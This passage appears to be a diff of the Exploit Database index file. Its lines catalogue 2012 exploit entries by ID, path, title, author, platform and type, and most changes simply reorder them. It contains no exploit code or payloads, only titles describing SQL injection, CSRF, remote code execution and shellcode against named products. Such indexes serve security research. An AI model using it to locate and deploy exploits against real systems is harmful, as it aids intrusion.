18416,platforms/jsp/webapps/18416.txt,"stoneware webnetwork6 - Multiple Vulnerabilities",2012-01-24,"Jacob Holcomb",jsp,webapps,0 18417,platforms/php/webapps/18417.txt,"wordpress <= 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0 18418,platforms/php/webapps/18418.html,"VR GPub 4.0 - CSRF Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0 @@ -15917,14 +15968,13 @@ id,file,description,date,author,platform,type,port 18424,platforms/php/webapps/18424.rb,"vBSEO <= 3.6.0 - ""proc_deutf()"" Remote PHP Code Injection Exploit",2012-01-27,EgiX,php,webapps,0 18426,platforms/windows/remote/18426.rb,"Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)",2012-01-28,metasploit,windows,remote,0 18427,platforms/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos,0 -18428,platforms/php/webapps/18428.txt,"HostBill App 2.3 - Remote Code Injection Vulnerability",2012-01-30,Dr.DaShEr,php,webapps,0 18429,platforms/php/webapps/18429.pl,"4images 1.7.6-9 - CSRF Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0 18430,platforms/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 SQLi Vulnerability",2012-01-30,"Craig Freyman",multiple,webapps,0 18431,platforms/multiple/webapps/18431.txt,"Ajax Upload Arbitrary File Upload",2012-01-30,"Daniel Godoy",multiple,webapps,0 18432,platforms/php/webapps/18432.txt,"phux Download Manager Blind SQL Injection Vulnerability",2012-01-30,"Red Security TEAM",php,webapps,0 -18434,platforms/php/webapps/18434.txt,"Snort Report <= 1.3.2 - SQL Injection Vulnerability",2012-01-31,"a.kadir altan",php,webapps,0 18435,platforms/php/webapps/18435.txt,"phpShowtime Directory Traversal",2012-01-31,"Red Security TEAM",php,webapps,0 18436,platforms/linux/dos/18436.txt,"sudo 1.8.0 - 1.8.3p1 Format String Vulnerability",2012-01-31,joernchen,linux,dos,0 +18434,platforms/php/webapps/18434.txt,"Snort Report <= 1.3.2 - SQL Injection Vulnerability",2012-01-31,"a.kadir altan",php,webapps,0 18437,platforms/windows/remote/18437.txt,"Adobe Flash Player MP4 SequenceParameterSetNALUnit Remote Code Execution Exploit",2012-01-31,Abysssec,windows,remote,0 18438,platforms/php/webapps/18438.txt,"Ez Album Blind SQL Injection Vulnerability",2012-01-31,"Red Security TEAM",php,webapps,0 18439,platforms/php/webapps/18439.txt,"PragmaMX 1.2.10 Persistent XSS Vulnerability",2012-01-31,HauntIT,php,webapps,0 @@ -15964,6 +16014,7 @@ id,file,description,date,author,platform,type,port 18480,platforms/php/webapps/18480.txt,"Dolibarr CMS 3.2.0 - Alpha - File Include Vulnerabilities",2012-02-10,Vulnerability-Lab,php,webapps,0 18481,platforms/windows/dos/18481.py,"jetVideo 8.0.2 - Denial of Service",2012-02-10,"Senator of Pirates",windows,dos,0 18483,platforms/php/webapps/18483.txt,"Fork CMS 3.2.4 - Multiple Vulnerabilities (LFI - XSS)",2012-02-12,"Avram Marius",php,webapps,0 +18499,platforms/hardware/webapps/18499.txt,"D-Link DSL-2640B (ADSL Router) CSRF Vulnerability",2012-02-20,"Ivano Binetti",hardware,webapps,0 18485,platforms/windows/remote/18485.rb,"Java MixerSequencer Object GM_Song Structure Handling Vulnerability",2012-02-16,metasploit,windows,remote,0 18487,platforms/php/webapps/18487.html,"SocialCMS 1.0.2 - CSRF Vulnerability",2012-02-16,"Ivano Binetti",php,webapps,0 18488,platforms/windows/dos/18488.txt,"Novell GroupWise Messenger <= 2.1.0 - Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 @@ -15976,38 +16027,41 @@ id,file,description,date,author,platform,type,port 18495,platforms/php/webapps/18495.html,"almnzm 2.4 - CSRF Vulnerability (Add Admin)",2012-02-18,"HaNniBaL KsA",php,webapps,0 18497,platforms/php/webapps/18497.txt,"4PSA CMS SQL Injection Vulnerabilities",2012-02-19,"BHG Security Center",php,webapps,0 18498,platforms/php/webapps/18498.html,"SyndeoCMS <= 3.0 - CSRF Vulnerability",2012-02-19,"Ivano Binetti",php,webapps,0 -18499,platforms/hardware/webapps/18499.txt,"D-Link DSL-2640B (ADSL Router) CSRF Vulnerability",2012-02-20,"Ivano Binetti",hardware,webapps,0 18500,platforms/windows/local/18500.py,"Blade API Monitor Unicode Bypass (Serial Number BOF)",2012-02-20,b33f,windows,local,0 18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 SEH Exploit MSF",2012-02-20,Death-Shadow-Dark,windows,local,0 18502,platforms/php/webapps/18502.html,"PlumeCMS <= 1.2.4 - CSRF Vulnerability",2012-02-20,"Ivano Binetti",php,webapps,0 18503,platforms/hardware/webapps/18503.txt,"Cisco Linksys WAG54GS CSRF Change Admin Password",2012-02-21,"Ivano Binetti",hardware,webapps,0 18504,platforms/hardware/webapps/18504.txt,"Sagem F@ST 2604 - CSRF Vulnerability (ADSL Router)",2012-02-22,"KinG Of PiraTeS",hardware,webapps,0 +18561,platforms/php/webapps/18561.txt,"lizard cart SQLi (search.php)",2012-03-05,"Number 7",php,webapps,0 +18563,platforms/php/webapps/18563.txt,"forkcms 3.2.5 - Multiple Vulnerabilities",2012-02-21,"Ivano Binetti",php,webapps,0 18506,platforms/php/webapps/18506.txt,"BRIM < 2.0.0 - SQL Injection",2012-02-22,ifnull,php,webapps,0 +18520,platforms/windows/remote/18520.rb,"Sun Java Web Start Plugin Command Line Argument Injection (2012)",2012-02-24,metasploit,windows,remote,0 18507,platforms/windows/dos/18507.py,"DAMN Hash Calculator 1.5.1 - Local Heap Overflow PoC",2012-02-22,"Julien Ahrens",windows,dos,0 18508,platforms/php/webapps/18508.txt,"Limesurvey (PHPSurveyor 1.91+ stable) Blind SQL Injection",2012-02-22,TorTukiTu,php,webapps,0 +18513,platforms/php/webapps/18513.txt,"DFLabs PTK <= 1.0.5 - Multiple Vulnerabilities (Steal Authentication Credentials)",2012-02-22,"Ivano Binetti",php,webapps,0 18509,platforms/hardware/webapps/18509.html,"Dlink DCS series CSRF Change Admin Password",2012-02-22,rigan,hardware,webapps,0 18510,platforms/windows/webapps/18510.txt,"webcamxp and webcam 7 - Directory Traversal Vulnerability",2012-02-22,Silent_Dream,windows,webapps,0 18511,platforms/hardware/webapps/18511.txt,"D-Link DSL-2640B Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps,0 18512,platforms/windows/dos/18512.txt,"Unity 3D Web Player <= 3.2.0.61061 - Denial of Service",2012-02-22,"Luigi Auriemma",windows,dos,0 -18513,platforms/php/webapps/18513.txt,"DFLabs PTK <= 1.0.5 - Multiple Vulnerabilities (Steal Authentication Credentials)",2012-02-22,"Ivano Binetti",php,webapps,0 18514,platforms/windows/remote/18514.rb,"TrendMicro Control Manger <= 5.5 CmdProcessor.exe - Stack Buffer Overflow",2012-02-23,metasploit,windows,remote,0 18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow",2012-02-23,metasploit,windows,local,0 18516,platforms/php/webapps/18516.txt,"phpDenora <= 1.4.6 - Multiple SQL Injection Vulnerabilities",2012-02-23,NLSecurity,php,webapps,0 18517,platforms/hardware/webapps/18517.txt,"Snom IP Phone - Privilege Escalation",2012-02-23,"Sense of Security",hardware,webapps,0 -18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 (Eng/Ita) Remote File Upload Remote Code Execution",2012-02-23,"Danny Moules",php,webapps,0 18519,platforms/php/webapps/18519.txt,"PHP Gift Registry 1.5.5 - SQL Injection",2012-02-24,G13,php,webapps,0 -18520,platforms/windows/remote/18520.rb,"Sun Java Web Start Plugin Command Line Argument Injection (2012)",2012-02-24,metasploit,windows,remote,0 +18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 (Eng/Ita) Remote File Upload Remote Code Execution",2012-02-23,"Danny Moules",php,webapps,0 18521,platforms/windows/remote/18521.rb,"HP Data Protector 6.1 EXEC_CMD Remote Code Execution",2012-02-25,metasploit,windows,remote,0 18522,platforms/php/webapps/18522.php,"cPassMan 1.82 - Remote Command Execution Exploit",2012-02-25,ls,php,webapps,0 18523,platforms/php/webapps/18523.txt,"webgrind 1.0 (file param) Local File Inclusion Vulnerability",2012-02-25,LiquidWorm,php,webapps,0 18524,platforms/windows/dos/18524.py,"Tiny HTTP Server <= 1.1.9 - Remote Crash PoC",2012-02-25,localh0t,windows,dos,0 18526,platforms/php/webapps/18526.php,"YVS Image Gallery SQL Injection",2012-02-25,CorryL,php,webapps,0 18527,platforms/php/webapps/18527.txt,"ContaoCMS (aka TYPOlight) <= 2.11 - CSRF (Delete Admin - Delete Article)",2012-02-26,"Ivano Binetti",php,webapps,0 +18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - (.pls) Stack Buffer Overflow",2012-03-02,metasploit,windows,local,0 18531,platforms/windows/remote/18531.html,"Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow Vulnerability",2012-02-27,Vulnerability-Lab,windows,local,0 18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0 18535,platforms/windows/remote/18535.py,"Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 18536,platforms/php/webapps/18536.txt,"WebfolioCMS <= 1.1.4 - CSRF (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0 +18702,platforms/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - ipswcom.dll ActiveX Stack Buffer Overflow",2012-02-29,metasploit,windows,remote,0 18539,platforms/windows/remote/18539.rb,"IBM Personal Communications I-Series Access WorkStation 5.9 Profile",2012-02-29,metasploit,windows,remote,0 18540,platforms/hardware/webapps/18540.txt,"Yealink VOIP Phone Persistent Cross-Site Scripting Vulnerability",2012-02-29,"Narendra Shinde",hardware,webapps,0 @@ -16016,10 +16070,12 @@ id,file,description,date,author,platform,type,port 18543,platforms/windows/remote/18543.py,"Netmechanica NetDecision Dashboard Server Information Disclosure Vulnerability",2012-02-29,"SecPod Research",windows,remote,0 18544,platforms/php/webapps/18544.txt,"ImgPals Photo Host 1.0 - Admin Account Disactivation",2012-02-29,CorryL,php,webapps,0 18545,platforms/php/webapps/18545.txt,"Wolf CMS 0.7.5 - Multiple Vulnerabilities",2012-02-29,longrifle0x,php,webapps,0 +18560,platforms/php/webapps/18560.txt,"Symfony2 - Local File Disclosure",2012-03-05,"Sense of Security",php,webapps,0 18546,platforms/windows/dos/18546.txt,"Novell Groupwise Address Book Remote Code Execution",2012-03-01,"Francis Provencher",windows,dos,0 -18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - (.pls) Stack Buffer Overflow",2012-03-02,metasploit,windows,local,0 18548,platforms/windows/local/18548.rb,"VLC Media Player RealText Subtitle Overflow",2012-03-02,metasploit,windows,local,0 18549,platforms/php/webapps/18549.txt,"phxEventManager 2.0 beta 5 - search.php search_terms SQL Injection",2012-03-02,skysbsb,php,webapps,0 +18565,platforms/php/remote/18565.rb,"LotusCMS 3.0 eval() Remote Command Execution",2012-03-07,metasploit,php,remote,0 +18564,platforms/php/webapps/18564.txt,"Drupal CMS 7.12 - Multiple Vulnerabilities",2012-03-02,"Ivano Binetti",php,webapps,0 18552,platforms/windows/dos/18552.pl,"Passport PC To Host Malformed .zws file Memory Corruption Vulnerability",2012-03-03,Silent_Dream,windows,dos,0 18553,platforms/multiple/webapps/18553.txt,"Rivettracker <= 1.03 - Multiple SQL injection",2012-03-03,"Ali Raheem",multiple,webapps,0 18554,platforms/php/webapps/18554.txt,"Timesheet Next Gen 1.5.2 - Multiple SQLi",2012-03-03,G13,php,webapps,0 @@ -16028,18 +16084,16 @@ id,file,description,date,author,platform,type,port 18557,platforms/windows/remote/18557.rb,"Sysax 5.53 SSH Username Buffer Overflow (msf)",2012-03-04,metasploit,windows,remote,0 18558,platforms/php/webapps/18558.txt,"deV!L`z Clanportal Witze Addon 0.9 - SQL Injection Vulnerability",2012-03-04,"Easy Laster",php,webapps,0 18559,platforms/php/webapps/18559.txt,"AneCMS 2e2c583 - LFI Exploit",2012-03-04,"I2sec-Jong Hwan Park",php,webapps,0 -18560,platforms/php/webapps/18560.txt,"Symfony2 - Local File Disclosure",2012-03-05,"Sense of Security",php,webapps,0 -18561,platforms/php/webapps/18561.txt,"lizard cart SQLi (search.php)",2012-03-05,"Number 7",php,webapps,0 -18563,platforms/php/webapps/18563.txt,"forkcms 3.2.5 - Multiple Vulnerabilities",2012-02-21,"Ivano Binetti",php,webapps,0 -18564,platforms/php/webapps/18564.txt,"Drupal CMS 7.12 - Multiple Vulnerabilities",2012-03-02,"Ivano Binetti",php,webapps,0 -18565,platforms/php/remote/18565.rb,"LotusCMS 3.0 eval() Remote Command Execution",2012-03-07,metasploit,php,remote,0 18566,platforms/asp/webapps/18566.txt,"Iciniti Store - SQL Injection",2012-03-07,"Sense of Security",asp,webapps,0 18567,platforms/windows/webapps/18567.txt,"HomeSeer HS2 and HomeSeer PRO Multiple Vulnerabilities",2012-03-07,Silent_Dream,windows,webapps,0 +18703,platforms/windows/remote/18703.txt,"Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115) Remote File Creation / Overwrite PoC",2012-04-05,rgod,windows,remote,0 +18600,platforms/multiple/dos/18600.txt,"presto! pagemanager <= 9.01 - Multiple Vulnerabilities",2012-03-14,"Luigi Auriemma",multiple,dos,0 +18601,platforms/multiple/dos/18601.txt,"EMC NetWorker <= 7.6 sp3 - Denial of Service",2012-03-14,"Luigi Auriemma",multiple,dos,0 18571,platforms/php/webapps/18571.txt,"promise webpam 2.2.0.13 - Multiple Vulnerabilities",2012-03-07,LiquidWorm,php,webapps,0 18572,platforms/windows/remote/18572.rb,"Adobe Flash Player .mp4 - 'cprt' Overflow""",2012-03-08,metasploit,windows,remote,0 -18574,platforms/php/webapps/18574.txt,"RazorCMS <= 1.2.1 STABLE File Upload Vulnerability",2012-03-08,"i2sec_Hyo jun Oh",php,webapps,0 18575,platforms/php/webapps/18575.txt,"RazorCMS <= 1.2.1 STABLE CSRF (Delete Web Pages)",2012-03-08,"Ivano Binetti",php,webapps,0 18578,platforms/php/webapps/18578.txt,"PHP Address Book 6.2.12 - Multiple security vulnerabilities",2012-03-10,"Stefan Schurtz",php,webapps,0 +18574,platforms/php/webapps/18574.txt,"RazorCMS <= 1.2.1 STABLE File Upload Vulnerability",2012-03-08,"i2sec_Hyo jun Oh",php,webapps,0 18579,platforms/linux/dos/18579.txt,"PyPAM - Python bindings for PAM - Double Free Corruption",2012-03-10,"Markus Vervier",linux,dos,0 18582,platforms/cgi/webapps/18582.txt,"Zend Server 5.6.0 - Multiple Remote Script Insertion Vulnerabilities",2012-03-12,LiquidWorm,cgi,webapps,0 18583,platforms/php/webapps/18583.txt,"Saman Portal Local File Inclusion Vulnerability",2012-03-12,TMT,php,webapps,0 @@ -16047,18 +16101,17 @@ id,file,description,date,author,platform,type,port 18585,platforms/lin_x86-64/shellcode/18585.s,"Linux x86_64 - add user with passwd (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode,0 18586,platforms/windows/dos/18586.txt,"XnView FlashPix Image Processing Heap Overflow",2012-03-12,"Francis Provencher",windows,dos,0 18587,platforms/windows/dos/18587.py,"Network Instrument Observer SNMP SetRequest Denial of Service Vulnerability",2012-03-12,"Francis Provencher",windows,dos,0 +18616,platforms/php/webapps/18616.txt,"Pre Printing Press product_desc.php (pid) SQL Injection Vulnerability",2012-03-18,"Easy Laster",php,webapps,0 +18618,platforms/php/webapps/18618.pl,"Joomla 2.5.0-2.5.1 Time Based SQL Injection Exploit",2012-03-19,"A. Ramos",php,webapps,0 +18619,platforms/multiple/remote/18619.txt,"Apache Tomcat Remote Exploit (PUT Request) and Account Scanner",2012-03-19,kingcope,multiple,remote,0 18589,platforms/php/webapps/18589.txt,"Acal calendar 2.2.6 - CSRF Vulnerability",2012-03-12,"Number 7",php,webapps,0 +18595,platforms/php/webapps/18595.txt,"Max Guestbook 1.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 18590,platforms/php/webapps/18590.txt,"PBLang Local file include Vulnerability",2012-03-13,"Number 7",php,webapps,0 18591,platforms/php/webapps/18591.txt,"Cycade Gallery SQL Injection Exploit",2012-03-13,-DownFall,php,webapps,0 18592,platforms/php/webapps/18592.txt,"4images - Image Gallery Management System - CSRF",2012-03-13,"Dmar al3noOoz",php,webapps,0 -18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 -18594,platforms/php/webapps/18594.txt,"Simple Posting System Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 -18595,platforms/php/webapps/18595.txt,"Max Guestbook 1.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 18597,platforms/hardware/webapps/18597.txt,"Sitecom WLM-2501 - CSRF Vulnerabilities",2012-03-14,"Ivano Binetti",hardware,webapps,0 18598,platforms/php/webapps/18598.txt,"Encaps PHP Gallery SQL Injection",2012-03-14,"Daniel Godoy",php,webapps,0 18599,platforms/php/webapps/18599.txt,"asaanCart XSS/LFI Vulnerabilities",2012-03-14,"Number 7",php,webapps,0 -18600,platforms/multiple/dos/18600.txt,"presto! pagemanager <= 9.01 - Multiple Vulnerabilities",2012-03-14,"Luigi Auriemma",multiple,dos,0 -18601,platforms/multiple/dos/18601.txt,"EMC NetWorker <= 7.6 sp3 - Denial of Service",2012-03-14,"Luigi Auriemma",multiple,dos,0 18602,platforms/windows/dos/18602.txt,"Epson EventManager <= 2.50 - Denial of Service",2012-03-14,"Luigi Auriemma",windows,dos,0 18603,platforms/windows/webapps/18603.txt,"TVersity <= 1.9.7 - Arbitrary File Download",2012-03-14,"Luigi Auriemma",windows,webapps,0 18604,platforms/windows/remote/18604.rb,"NetDecision 4.5.1 HTTP Server Buffer Overflow",2012-03-15,metasploit,windows,remote,0 @@ -16069,12 +16122,11 @@ id,file,description,date,author,platform,type,port 18609,platforms/php/webapps/18609.txt,"FlexCMS 3.2.1 - Multiple CSRF Vulnerabilities",2012-03-16,"Ivano Binetti",php,webapps,0 18610,platforms/windows/remote/18610.pl,"Tiny Server 1.1.5 - Arbitrary File Disclosure Exploit",2012-03-16,KaHPeSeSe,windows,remote,0 18611,platforms/windows/local/18611.rb,"RM Downloader 3.1.3.3.2010.06.26 - (.m3u) Buffer Overflow (MSF)",2012-03-16,KaHPeSeSe,windows,local,0 +18704,platforms/windows/remote/18704.txt,"Quest vWorkspace 7.5 Connection Broker Client ActiveX Control (pnllmcli.dll 7.5.304.547) SaveMiniLaunchFile() Method Remote File Creation / Overwrite PoC",2012-04-05,rgod,windows,remote,0 +18705,platforms/hardware/dos/18705.txt,"Sony Bravia Remote Denial of Service",2012-04-05,"Gabriel Menezes Nunes",hardware,dos,0 18613,platforms/php/webapps/18613.txt,"ASP Classifieds SQL Injection",2012-03-17,r45c4l,php,webapps,0 18614,platforms/php/webapps/18614.txt,"PRE PRINTING STUDIO SQL Injection",2012-03-17,r45c4l,php,webapps,0 -18615,platforms/windows/dos/18615.py,"TypesoftFTP Server 1.1 - Remote DoS (APPE)",2012-03-17,"brock haun",windows,dos,0 -18616,platforms/php/webapps/18616.txt,"Pre Printing Press product_desc.php (pid) SQL Injection Vulnerability",2012-03-18,"Easy Laster",php,webapps,0 -18618,platforms/php/webapps/18618.pl,"Joomla 2.5.0-2.5.1 Time Based SQL Injection Exploit",2012-03-19,"A. Ramos",php,webapps,0 -18619,platforms/multiple/remote/18619.txt,"Apache Tomcat Remote Exploit (PUT Request) and Account Scanner",2012-03-19,kingcope,multiple,remote,0 +18632,platforms/php/webapps/18632.txt,"OneFileCMS - Failure to Restrict URL Access",2012-03-20,"Abhi M Balakrishnan",php,webapps,0 18621,platforms/windows/remote/18621.txt,"Dell Webcam Software Bundled ActiveX Remote Buffer Overflow Vulnerability",2012-03-19,rgod,windows,remote,0 18622,platforms/windows/remote/18622.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server Remote Code Execution Vulnerability",2012-03-19,rgod,windows,remote,0 18623,platforms/windows/remote/18623.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server Remote Arbitrary File Deletion Vulnerability",2012-03-19,rgod,windows,remote,0 @@ -16085,7 +16137,7 @@ id,file,description,date,author,platform,type,port 18629,platforms/windows/dos/18629.py,"Tiny Server <= 1.1.9 HTTP HEAD DoS",2012-03-20,"brock haun",windows,dos,0 18630,platforms/android/dos/18630.txt,"Android FTPServer 1.9.0 - Remote DoS",2012-03-20,G13,android,dos,0 18631,platforms/php/webapps/18631.txt,"OneForum (topic.php) SQL Injection Vulnerability",2012-03-20,"Red Security TEAM",php,webapps,0 -18632,platforms/php/webapps/18632.txt,"OneFileCMS - Failure to Restrict URL Access",2012-03-20,"Abhi M Balakrishnan",php,webapps,0 +18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Remote LFI Root Exploit",2012-05-26,muts,linux,remote,0 18633,platforms/windows/dos/18633.txt,"Adobe Photoshop 12.1 Tiff Parsing Use-After-Free",2012-03-20,"Francis Provencher",windows,dos,0 18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk ActiveX BackImage Vulnerability",2012-03-21,metasploit,windows,remote,0 18636,platforms/windows/dos/18636.txt,"Oreans Themida 2.1.8.0 - TMD File Handling Buffer Overflow Vulnerability",2012-03-21,LiquidWorm,windows,dos,0 @@ -16100,7 +16152,7 @@ id,file,description,date,author,platform,type,port 18646,platforms/hardware/webapps/18646.txt,"Cyberoam UTM Multiiple Vulnerabilities",2012-03-22,"Saurabh Harit",hardware,webapps,0 18647,platforms/php/webapps/18647.txt,"PHP Grade Book 1.9.4 Unauthenticated SQL Database Export",2012-03-22,"Mark Stanislav",php,webapps,0 18648,platforms/php/webapps/18648.txt,"phpMoneyBooks 1.0.2 - Local File Inclusion",2012-03-22,"Mark Stanislav",php,webapps,0 -18649,platforms/php/webapps/18649.txt,"FreePBX 2.10.0, 2.9.0 - Multiple Vulnerabilities",2012-03-22,"Martin Tschirsich",php,webapps,0 +18649,platforms/php/webapps/18649.txt,"FreePBX 2.10.0 / 2.9.0 - Multiple Vulnerabilities",2012-03-22,"Martin Tschirsich",php,webapps,0 18650,platforms/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution Exploit",2012-03-23,muts,php,webapps,0 18651,platforms/asp/webapps/18651.txt,"Sitecom WLM-2501 new Multiple CSRF Vulnerabilities",2012-03-23,"Ivano Binetti",asp,webapps,0 18652,platforms/php/webapps/18652.txt,"Wolfcms <= 0.75 - Multiple Vulnerabilities (CSRF - XSS)",2012-03-23,"Ivano Binetti",php,webapps,0 @@ -16108,21 +16160,23 @@ id,file,description,date,author,platform,type,port 18655,platforms/php/webapps/18655.php,"phpFox <= 3.0.1 (ajax.php) Remote Command Execution Exploit",2012-03-23,EgiX,php,webapps,0 18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 - (.m3u) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - (.ppl) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 +18695,platforms/windows/remote/18695.py,"sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow""",2012-03-24,metasploit,windows,remote,0 18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution",2012-03-24,metasploit,php,webapps,0 18660,platforms/php/webapps/18660.txt,"RIPS <= 0.53 - Multiple Local File Inclusion Vulnerabilities",2012-03-24,localh0t,php,webapps,0 18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 file handling memory corruption",2012-03-24,"Senator of Pirates",windows,dos,0 -18665,platforms/multiple/dos/18665.py,"PHP 5.4.0 Built-in Web Server DoS PoC",2012-03-25,ls,multiple,dos,0 +18676,platforms/php/webapps/18676.txt,"boastMachine <= 3.1 - CSRF Add Admin Vulnerability",2012-03-28,Dr.NaNo,php,webapps,0 +18670,platforms/php/webapps/18670.txt,"PicoPublisher 2.0 - Remote SQL Injection",2012-03-28,ZeTH,php,webapps,0 18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow",2012-03-26,metasploit,windows,remote,0 +18665,platforms/multiple/dos/18665.py,"PHP 5.4.0 Built-in Web Server DoS PoC",2012-03-25,ls,multiple,dos,0 18667,platforms/php/webapps/18667.html,"Family CMS <= 2.9 - Multiple Vulnerabilities",2012-03-26,"Ahmed Elhady Mohamed",php,webapps,0 18668,platforms/php/webapps/18668.txt,"vBshop Multiple Persistent XSS Vulnerabilities",2012-03-26,ToiL,php,webapps,0 -18670,platforms/php/webapps/18670.txt,"PicoPublisher 2.0 - Remote SQL Injection",2012-03-28,ZeTH,php,webapps,0 18671,platforms/windows/dos/18671.pl,"KnFTPd 1.0.0 - 'FEAT' DoS PoC-Exploit",2012-03-28,"Stefan Schurtz",windows,dos,0 18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x ReportTree and SimpleTree Classes",2012-03-28,rgod,windows,remote,0 18673,platforms/hardware/remote/18673.txt,"D-Link DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability",2012-03-28,rgod,hardware,remote,0 18674,platforms/windows/remote/18674.txt,"Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution",2012-03-28,rgod,windows,remote,0 18675,platforms/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,hardware,remote,0 -18676,platforms/php/webapps/18676.txt,"boastMachine <= 3.1 - CSRF Add Admin Vulnerability",2012-03-28,Dr.NaNo,php,webapps,0 +18717,platforms/windows/dos/18717.txt,"AnvSoft Any Video Converter 4.3.6 - Multiple Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 18679,platforms/multiple/remote/18679.rb,"Java AtomicReferenceArray Type Violation Vulnerability",2012-03-30,metasploit,multiple,remote,0 18680,platforms/php/webapps/18680.txt,"coppermine 1.5.18 - Multiple Vulnerabilities",2012-03-30,waraxe,php,webapps,0 18681,platforms/windows/local/18681.txt,"Bitsmith PS Knowbase 3.2.3 - Buffer Overflow Vulnerability",2012-03-30,Vulnerability-Lab,windows,local,0 @@ -16138,27 +16192,16 @@ id,file,description,date,author,platform,type,port 18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - (.aiff) Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0 18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH&DEP&ASLR",2012-04-03,b33f,windows,local,0 18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda <= 2.2.8 - CSRF (Add Admin - Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0 -18695,platforms/windows/remote/18695.py,"sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 -18697,platforms/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Buffer Overflow',",2012-04-04,metasploit,windows,remote,0 -18698,platforms/windows/dos/18698.py,"Xion Audio Player 1.0.127 - (.aiff) Denial of Service Vulnerability",2012-04-04,condis,windows,dos,0 -18699,platforms/php/webapps/18699.txt,"PlumeCMS <= 1.2.4 - Multiple Persistent XSS",2012-04-04,"Ivano Binetti",php,webapps,0 -18700,platforms/php/webapps/18700.txt,"e-ticketing - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 -18701,platforms/php/webapps/18701.txt,"phpPaleo - Local File Inclusion",2012-04-04,"Mark Stanislav",php,webapps,0 -18702,platforms/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 -18703,platforms/windows/remote/18703.txt,"Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115) Remote File Creation / Overwrite PoC",2012-04-05,rgod,windows,remote,0 -18704,platforms/windows/remote/18704.txt,"Quest vWorkspace 7.5 Connection Broker Client ActiveX Control (pnllmcli.dll 7.5.304.547) SaveMiniLaunchFile() Method Remote File Creation / Overwrite PoC",2012-04-05,rgod,windows,remote,0 -18705,platforms/hardware/dos/18705.txt,"Sony Bravia Remote Denial of Service",2012-04-05,"Gabriel Menezes Nunes",hardware,dos,0 18708,platforms/php/webapps/18708.txt,"GENU CMS SQL Injection Vulnerability",2012-04-05,"hordcode security",php,webapps,0 18709,platforms/windows/remote/18709.rb,"TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow",2012-04-06,metasploit,windows,remote,0 18710,platforms/windows/local/18710.rb,"Csound hetro File Handling Stack Buffer Overflow",2012-04-06,metasploit,windows,local,0 18711,platforms/php/webapps/18711.txt,"w-cms 2.0.1 - Multiple 